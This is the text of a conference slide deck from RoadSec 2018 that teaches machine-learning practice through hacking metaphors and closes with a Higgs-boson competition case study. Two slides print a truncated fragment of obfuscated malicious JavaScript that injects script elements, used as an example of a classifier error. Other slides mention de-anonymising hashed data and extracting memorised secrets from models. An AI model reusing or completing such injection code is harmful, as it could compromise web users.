Más contenido relacionado

Hacking Predictive Modeling - RoadSec 2018

  1. Hacking Predictive Modeling HJ van Veen - Data Science & InfoSec @ Nubank
  2. 2 “Do machine learning like the great [hacker] you are, not like the great machine learning expert you aren’t.” - Zinkevich
 Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
  3. Who am I? • Thankful for the opportunity to speak here! • Data scientist & InfoSec analyst at Nubank
 • Competitive data science fanatic
 • Horrible Portuguese speaker (more so with public speaking). Questions and clarifications in English please.
 • @mlwave
  4. Disclaimer • These slides are for entertainment, educational and research purposes only.
 • ML is powerful and easy: “Como toda descoberta científica dá mais poderes sobre a natureza, ela pode aumentar o bem ou o mal.” - César Lattes
 • Hacking is fun: But not a substitute for rigorous study and theory. Think of the impact your ML solution has on users.
  5. Scope • This presentation will be all over the place. I don’t know if you never trained a model before, or are experienced with ML.
 • But I hope this presentation will be interesting for the hackers, makers, creators of all types.
 • Catch me afterwards, if you want to talk about hyper optimization.

  6. What is AI?
  7. What is AI? Self-Normalizing Neural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)
  8. What is AI?
  9. What is AI? Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.) Boy holds baseball bat Cat sits on couch
  10. What is AI? • AI grew out of Operations Research after WWII
 • AI consists of many diverse subfields ranging from: Psychology, Neuroscience, Mathematics, Linguistics, Learning Theory, (Quantum) Physics, Computer Science, Information Theory, Statistics, Robotics, Philosophy, Machine Learning. • Fight hype. Just replace word `AI` with `Software`: If result sounds silly or obvious, then the application of AI usually is too. Power word: “What is your false positive rate?”. 

  11. What is Machine Learning? • Automatically learn from data
 • Increased business usage: AI, Machine Learning, Software will continue eating the world. • Unsupervised learning (Amazon Recommendations). Supervised learning (Spam classification). Reinforcement learning & Self-supervision/Self-play (AlphaGo). • Consists of: Engineering, research, data management, domain expertise, analysis, decision science, safety, legal, ethics, UX, monitoring, predictive modeling.
 Why Software Is Eating the World (2016, Andreessen Horowitz)
  12. What is Predictive Modeling? • Puts the focus on creating predictions:
 • Use of model, • how to use the data, • how to get good accuracy.
 • Essential to create a first solution. But the bare minimum to what goes into Machine Learning at commercial scale. ML competitions are largely about predictive modeling.
  13. Useful Paradigms • Functionalism: Input -> Function -> Output
 • Connectionism: Learn from data bottom-up, not top-down by stacking learning primitives.
 • Black Box Learning: Let the machine do the work. Don’t care if I understand what it does.
 • Coding Theory: Error detection and compression
  14. Functionalism • Philosophy of Mind: Mental states are defined by how they function, not defined by what they are made of. • Function does not depend on the material: You can build a functional mouse trap from wood or metal.
 • Perhaps we can model functional intelligence with computers too?

  15. Functionalism Transform Model OutputInput Reality Sensory Processing Mental Modeling Behavior Data Feature Engineering Predictive Modeling Predictions
  16. Connectionism • Philosophy of Mind: Cognition can arise by connecting functional nodes to form a network structure.
 • Artificial Neural Nets & Deep Learning are examples of this approach: Stacking layers of nodes for ever higher-level learning
 • Perhaps we can model intelligence with network architectures too?
 Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
  17. Connectionism Decision Demons Cognitive Demons Feature Demons Image Demons Pandemonium: A paradigm for learning. (Selfridge, 1959)
  18. Black Box ML • View machine learning models as a black box: You only care about what goes in, and what goes out (its function). "A labrador retriever puppy with tongue hanging out"
  19. Black Box ML • View machine learning models as a black box: You only care about what goes in, and what goes out (its function). • Don’t care if there is a magical deamon or a complex maths formula in the box. • Question then becomes: How to transform the data, how to parametrize the black box, so to get the best predictions? • Remember: Garbage in - Garbage out (Don’t trust for critical stuff like healthcare or self-driving cars or AGI) The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
  20. Coding Theory • Coding theory is concerned with effective communication and data integrity • Cryptography, Error Correction, Data Compression: All about finding (or hiding) the signal in the noise. • Machine Learning is essentially learning to correct errors. • Data compression, just like ML, is about finding the most relevant patterns.
  21. Coding Theory 1 MegaByte 180 KiloByte
  22. Data • Data can be structured or unstructured. • Tabular data is structured and can more readily be used
 • Text and Sound and Images are unstructured
 • Data can be temporal, for instance: time-series
 • Rarely, data is in shape of a graph (for instance, relations between gang members)
  23. Feature Engineering • Most data needs to be converted to numbers first
 • Feature engineering:
 Transform Model OutputInput Data Feature Engineering Predictive Modeling Predictions
  24. Feature Engineering • Most data needs to be converted to numbers first
 • Feature engineering:
 • is transforming data into something a model can understand. • Creative part of ML with enough tricks to write a book • Has a few basic tricks that are enough to get most models to work well.
 Feature Extraction - Foundations and Applications (Guyon et al., 2006)
  25. Feature Engineering: Tricks • Categorical Variables
 • One-hot encoding for neural nets:
 • Label encoding for decision trees: Red Green Blue 1 2 3 Red Green Blue Red Green Blue 1 0 0 0 1 0 0 0 1
  26. Feature Engineering: Tricks • That’s really (mostly) it!
 • You can now apply the most advanced machine learning algorithms to data and something you want to predict.
 • More advanced feature engineering uses domain expertise, intuition, unsupervised learning/embeddings, and automation (see FeatureTools).
 Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
  27. Modeling • A model tries to give accurate predictions for new unseen data. • It uses training data together with labels/ground truth/what you want to predict. Transform Model OutputInput Data Feature Engineering Predictive Modeling Predictions
  28. Modeling Gender Likes Open Source? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0
  29. Modeling Gender Likes Open Source? Wants RoadSec ticket? 0 1 ? • Gender did not show any correlation and 3/4 of people who Likes Open Source also wanted a RoadSec ticket. • A good model may predict a probability of 0.75, or a hard prediction of 1.
  30. Modeling • What model do you use for data? 
 • Tabular data: Gradient boosted decision trees (XGBoost)
 • Images: Pre-trained deep neural net (or Detectron)
 • Text: TFIDF -> Logistic Regression (or FastText, ULMNet, BERT) Search for above terms in combination with “machine learning”
  31. Evaluation Gender Likes Open Source? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0
  32. Evaluation Gender Likes Open Source? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0 Train Predict The Elements of Statistical Learning (2001, Friedman et al.)
  33. Evaluation Gender Likes Open Source? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0 Train Predict
  34. Evaluation Predictions Wants RoadSec ticket? 1 1 1 1 1 0 1 1 0 0 0 0 0 0 0 0 7/8 Accuracy Score
  35. Optimization • A Python classifier may look like:
 FactorizationMachineBinaryClassifier(iters=5, learning_rate=0.1, latent_dim=20, radius=0.5,
 lambda_linear=0.0001, lambda_latent=0.0001, normalize='Auto', norm=True, caching='Auto', shuffle=True, verbose=True) Trick is to tweak these parameters to get a better evaluation. Then stop when any change makes evaluation worse.
  36. Brute Forcing • View hyper parameter optimization as a password cracking task
 • Enumerate or randomly try all possible parameters within a range.
 • Dictionary attack: Use “password dictionary files” with good parameters that worked on other problems. Try these first.
 • This is basically Random Search or Adaptive Search
 Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
  37. Brute Forcing • How to find the best weights for an average ensemble? • Is it differentiable? • Which optimizer do we pick? • Do we set any regularization? • Allow negative weights?
 • How about trying every possible combination of weights and pick the best evaluation? Worst case: you spend 2 hours more compute.
  38. Brute Forcing • Do we really need to manually train all these models?
 • What would happen if we automatically train a 1000 random models with random data transformations and throw them all into another black box?
 • Out comes a winning Kaggle submission… 
 Kaggle Ensembling Guide (van Veen et al., 2015)
  39. Fuzzing with Permutations • View feature interaction expansion/feature selection as a fuzzing task. • Train a model and evaluate on test set.
 • For every column in test set: • randomly shuffle the column • Evaluate the new predictions • If evaluation is better with randomly shuffled features, then you can safely discard the column. 
 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle See Fast.AI tutorial for more on this technique.
  40. Script kiddies • Use tools developed by others to attack a machine learning problem. • ML Community is incentivized to share easy-replicable code. • Wield same power as the biggest AI companies in the world. • No shame in this! Start somewhere, why not near the top?

  41. Warez • Good tools: 
 • allow you to experiment and iterate quickly
 • have an active community contributing new features
 • can be applied to many different problems with similar results.
 • abstract away complexity.

  42. Python • Grown to be essential to data science and machine learning. 
 • Learn Python The Hard Way and you have access to an amazing machine learning stack. • Then learn “one-- and preferably only one --obvious way to do it.” • Python code can read like pseudo-code
 PEP 20 — The Zen of Python (Peters, 2004) Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
  43. Python from sklearn import datasets, ensemble iris = datasets.load_iris() X = iris.data y = iris.target model = ensemble.GradientBoostingClassifier() model.fit(X, y) p = model.predict(X)

  44. Scikit-Learn • The Metasploit of Machine Learning
 • Uses one API for all models (models are all trained the same way, so learn it only once, and have access to all models)
 • Could get by for a while learning only this library very well
 Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
  45. XGBoost • The best for tabular data: 
 • Extremely fast • Very good performance • Can model complex problems • Supports Scikit-Learn API
 • Alternatives: GradientBoostingClassifier, CatBoost, LightGBM. XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
  46. Keras User-friendly wrapper around deep learning libraries such as TensorFlow. • Learn Keras and you can work with the latest architectures in deep learning.
 • Alternatives: PyTorch with Fast.AI library
 Deep Learning with Python (Chollet, 2017)
  47. Vowpal Wabbit • Very fast online learning on data bigger than memory
 Can be faster and more accurate than Hadoop/Spark • Uses cool hashing trick inspired by Bloom filter • Support for contextual bandits (automated decision making) • Eat raw features: • 1 '10000074 |f category_x_transport emails_cnt:0.0 emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii exclamationmark 2005 A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
  48. Pandas & NumPy & SciPy • Read and manipulate tabular data with Pandas
 • Fast, scalable and supports many types of data
 • Perform vector operations on NumPy (or Numba) arrays
 • Wide support for scientific calculations 
 Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
  49. Reverse Engineering • Use frequency tables to reverse engineer the data to its original form.
 • label:TF -> English_word_frequency(IDF(label)) -> Porter_Stemmer(word):TF*IDF
 • feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) ->
 State:New_York Tricks as seen on the Kaggle forums
  50. Reverse Engineering • Use model predictions to reverse engineer the training data.
 • Simple brute-force can use fitted language models to retrieve: • Credit Card Numbers • Social Security Numbers / CPF’s • if it has seen this before once (DL is good at memorization) The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
  51. Social Engineering • You can not survive in most business with just predictive modeling.
 • Companies don’t hire an AutoML solution, they hire people.
 • The majority of the day-to-day complexity in the chain between data infrastructure and decision makers is social, not technical.
  52. Social Engineering • How to gain access to online data science community?
 • Compete together. • Write a cool blog about it. • Write/contribute Open Source projects. • Write tutorials/step-by-step’s.
 • Basically share everything: A 100-line Python script (toy wrapper for Regularized Greedy Forest) could grow to a professional project that you now can use yourself. https://github.com/RGF-team/rgf
  53. Operational Security • Business: • Keep pipelines simple • Document & Revisit • Automate, Test & Monitor
 • Competitions: • Loose lips sink ships: Be careful what competitive advantage you share • Show not tell: Save your most powerful models ‘till the very last
  54. Hacking Leaderboards • Always wanted to rank #1 on a leaderboard?
 • Wacky Boosting: • Keep changing your submission • use leaderboard feedback to see if it was a good change or a bad change. • Keep good changes. • Repeat until you are #1
 • Will horribly overfit, but can also cause others to overfit! Competing in a data science contest without reading the data (2015, Hardt)
  55. Information Snooping • Normally not advisable to use the test set. But for competitions the test is available, so:
 • Can use semi-supervised learning to extract information from the test set. Use test set for:
 • Frequency (TFIDF) or pre-training language models • Fitting dimensionality reduction • Adding confident predictions as labels to train set github.com/gatapia Guido Tapia
  56. Rainbow tables • Sometimes categorical variables are hashed to obscure them.
 • Can use rainbow tables to reverse (truncated) MD5 hash and get the original feature.
 • One time, this was obfuscated ordinals for a job puzzle • One time, this was private data: IP addresses. Oops! • One time, they forgot to obfuscate a misspelled patient name in a psychiatric report. Oops!
  57. Breaking Stuff • Keep asking your curious self: What would happen if I changed this to that? Be Bold!
 • Local evaluation is your lifeline.
 • Try everything, keep the good.
 • Once I got an accuracy of 181% by submitting correct answers twice. Statisticians Machine Learners Smart Machine Learner (The joke is that there are only smart statisticians) CV Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
  58. DataLeaks • A very common mistake. Can be deadly for business and science, so become good at finding leaks. • The task was to predict cancer. One of the variables was “underwent surgery for cancer, yes/no?” • You can not use data that is not reasonably available at test time (or your lifeline evaluation can not be trusted). Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
  59. DataLeaks • Beware: The more powerful your model, the bigger chance for exploiting any leakage left that you did not find. • Most powerful model is a 1000 data scientists on a typewriter, so that’s why competitions see larger leakage discovery.
 • A large sample of leakage may simply go undetected. Ben Hamner & Will Cukierski @ Kaggle
  60. DataLeaks • Winners of Microsoft malware binary classification 2015 were able to extract the desktop icon from the code. Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
  61. Sub-Linear Debugging • Output information while your computations are running, essential for iteration speed: • Can spot very fast if some change was good or bad. • Feels like NEO in the Matrix if you do this with the data itself during data reading. • Can spot data health issues (text encoding errors, all missing in the same row of data, etc.) Online Learning and Sub-Linear Debugging (Mineiro, 2014)
  62. Error Debugging • See where your model makes the biggest mistakes. • Then try to fix it by creating new features • Below sample confidently predicted as minified JS when it was actually obfuscated malicious JS:
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][ Warsaw.js
  63. Error Debugging • How to fix? • Add count of numbers / count of characters • Add human-readability score • Add count of “x” / count of characters
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
  64. Dumpster Diving • You should find out the sources and shapes of all your data, then do a deep dive:
 • Winners of the IJCNN 2011 Challenge wrote a Flickr crawler to de-anonimize users and obtain the ground truth.
 • Winners of the West Nile Virus Prediction Challenge found research papers which contained part of the ground truth.
 Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayan et al.)
  65. Adversarial Input • These people are invisible to % of modern face detection CV Dazzle (Harvey et al., 2010)
  66. Adversarial Input • This image is confusing to modern object detection “A foreign attack helicopter firing missiles” Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
  67. Adversarial Input • Being able to fool neural networks, or build strong defenses against adversarial images is hugely valuable.
 • NIPS2018: Defense Against Adversarial Attack • Goodfellow et al.: CleverHans • Google: Unrestricted Adversarial Examples Challenge
  68. Adversarial Thinking • Pretend you are an Identity Fraudster: • Do you hack at night or during your day job/school? • Do you change details like email to match your victim’s name? • Are you more likely to use Windows or Linux? • Do you move location often, or use Tor to hide your location? • Do you try to get as much money as fast as possible or more patient? • Do you memorize your victim’s personal details?

  69. Adversarial Thinking • Try to attack a system, then invent safeguards: • Encode time of day of the attempt • Look at string distance between legal name and email name • Deduce operating system from user agent string • Check if IP was used for malicious behavior before • Check if IP is a Tor IP • Check for how long user spend in funnel / form behavior • Check if the user demands an unusually high limit • … Statistical Fraud Detection: A Review (Bolton et al., 2002)
  70. Botnet • Much of commercial ML can or is being automated. Much of advertisement fraud is automated already. • It is possible to get a good score in a competition completely automatically. • You can aggregate the results of many (automated) agents and get an even better result. • Thinking back to the ID fraudster example. Can you imagine how to cheat a ML competition? Could you encode ways to safeguard against this? Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
  71. Case Study: Higgs Boson • “A ciência não pode prever o que vai acontecer. Só pode prever a probabilidade de algo acontecer.” - César Lattes
 • Use data from the ATLAS experiment to identify the Higgs boson (probability of it being signal or background noise)
 • No knowledge of particle physics is required.
 • XGBoost was a 0-day during competition (This could’ve been you!) Higgs Boson Detection Challenge (2014, Kaggle & CERN)
  72. Case Study: Higgs Boson • Lets hack together a solution: • Create random feature interactions and use Permutation Feature Importance to select the best ones • Add the best interactions to the data • Train 50 randomly initialized XGBoost models • Pick best log loss model and lower the learning rate and use early stopping to find the best amount of trees. • Repeat above 3 times and average results Position: 30/1785
  73. Further Learning • MOOC’s: Andrew Ng’s Machine Learning on Coursera, Competitive Data Science Coursera, Abu-Mustafa Caltech Learning from Data • Platforms: Kaggle (Tutorials, Projects, Competitions, Forums, Kernels) • Programs: Fast.AI (Learn deep learning state-of-the-art) • Meetups: Sao Paulo Machine Learning Meetup • Books: Programming Collective Intelligence • Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun! • Professors: Find cool professor and study their online output
  74. nubank.workable.com Nubank is hiring!